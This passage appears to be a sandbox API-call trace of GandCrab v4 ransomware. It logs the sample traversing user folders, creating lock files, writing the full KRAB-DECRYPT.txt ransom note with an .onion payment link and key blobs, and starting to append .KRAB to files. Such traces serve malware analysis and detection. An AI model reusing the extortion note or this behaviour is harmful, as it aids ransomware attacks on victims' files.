DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0100.424] WriteFile (in: hFile=0x434, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338efa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338efa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0100.426] CloseHandle (hObject=0x434) returned 1 [0100.427] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.427] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.427] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x2f, wMilliseconds=0x26e)) [0100.427] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.427] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0100.427] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0100.428] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\Documents\\My Pictures\\d2ca4a08d2ca4dee3d.lock") returned 62 [0100.428] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Pictures\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\default\\documents\\my pictures\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x434 [0100.430] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.430] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.430] lstrlenW (lpString="C:\\Users\\Default\\Documents\\My Pictures\\") returned 39 [0100.430] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Pictures\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Documents\\My Pictures\\*") returned="C:\\Users\\Default\\Documents\\My Pictures\\*" [0100.431] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\My Pictures\\*", lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 0xffffffff [0100.431] CloseHandle (hObject=0x434) returned 1 [0100.431] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0100.431] lstrcmpW (lpString1="My Videos", lpString2=".") returned 1 [0100.431] lstrcmpW (lpString1="My Videos", lpString2="..") returned 1 [0100.431] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\", lpString2="My Videos" | out: lpString1="C:\\Users\\Default\\Documents\\My Videos") returned="C:\\Users\\Default\\Documents\\My Videos" [0100.431] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Videos", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Documents\\My Videos\\") returned="C:\\Users\\Default\\Documents\\My Videos\\" [0100.431] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0100.431] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0100.431] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0100.431] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0100.431] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0100.431] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.432] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.432] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\Documents\\My Videos\\\\KRAB-DECRYPT.txt") returned 54 [0100.433] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Videos\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\default\\documents\\my videos\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0100.433] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0100.433] WriteFile (in: hFile=0x434, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338efa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338efa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0100.437] CloseHandle (hObject=0x434) returned 1 [0100.437] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.437] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.438] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x2f, wMilliseconds=0x27e)) [0100.438] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.438] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0100.438] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0100.439] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\Documents\\My Videos\\d2ca4a08d2ca4dee3d.lock") returned 60 [0100.439] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Videos\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\default\\documents\\my videos\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x434 [0100.440] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.441] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.441] lstrlenW (lpString="C:\\Users\\Default\\Documents\\My Videos\\") returned 37 [0100.441] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Videos\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Documents\\My Videos\\*") returned="C:\\Users\\Default\\Documents\\My Videos\\*" [0100.441] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\My Videos\\*", lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 0xffffffff [0100.441] CloseHandle (hObject=0x434) returned 1 [0100.441] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0 [0100.441] FindClose (in: hFindFile=0xfbdae0 | out: hFindFile=0xfbdae0) returned 1 [0100.442] CloseHandle (hObject=0x320) returned 1 [0100.442] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0100.442] lstrcmpW (lpString1="Downloads", lpString2=".") returned 1 [0100.442] lstrcmpW (lpString1="Downloads", lpString2="..") returned 1 [0100.442] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Downloads" | out: lpString1="C:\\Users\\Default\\Downloads") returned="C:\\Users\\Default\\Downloads" [0100.442] lstrcatW (in: lpString1="C:\\Users\\Default\\Downloads", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Downloads\\") returned="C:\\Users\\Default\\Downloads\\" [0100.442] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0100.442] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0100.442] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0100.442] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0100.442] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0100.442] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.443] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.443] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\Downloads\\\\KRAB-DECRYPT.txt") returned 44 [0100.443] CreateFileW (lpFileName="C:\\Users\\Default\\Downloads\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\default\\downloads\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0100.444] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0100.444] WriteFile (in: hFile=0x320, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338f220, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338f220*=0x1f6e, lpOverlapped=0x0) returned 1 [0100.445] CloseHandle (hObject=0x320) returned 1 [0100.445] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.445] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.445] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x2f, wMilliseconds=0x27e)) [0100.445] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.446] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0100.446] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0100.446] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\Downloads\\d2ca4a08d2ca4dee3d.lock") returned 50 [0100.446] CreateFileW (lpFileName="C:\\Users\\Default\\Downloads\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\default\\downloads\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x320 [0100.448] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.448] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.449] lstrlenW (lpString="C:\\Users\\Default\\Downloads\\") returned 27 [0100.449] lstrcatW (in: lpString1="C:\\Users\\Default\\Downloads\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Downloads\\*") returned="C:\\Users\\Default\\Downloads\\*" [0100.449] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Downloads\\*", lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0xfbdfe0 [0100.449] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0100.449] FindNextFileW (in: hFindFile=0xfbdfe0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0100.449] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0100.449] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0100.449] FindNextFileW (in: hFindFile=0xfbdfe0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0100.449] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0100.449] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0100.449] lstrcatW (in: lpString1="C:\\Users\\Default\\Downloads\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\Default\\Downloads\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\Default\\Downloads\\d2ca4a08d2ca4dee3d.lock" [0100.449] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.449] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\Downloads\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 55 [0100.449] lstrlenW (lpString="C:\\Users\\Default\\Downloads\\d2ca4a08d2ca4dee3d.lock") returned 50 [0100.449] lstrlenW (lpString=".lock") returned 5 [0100.449] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.450] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0100.450] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, 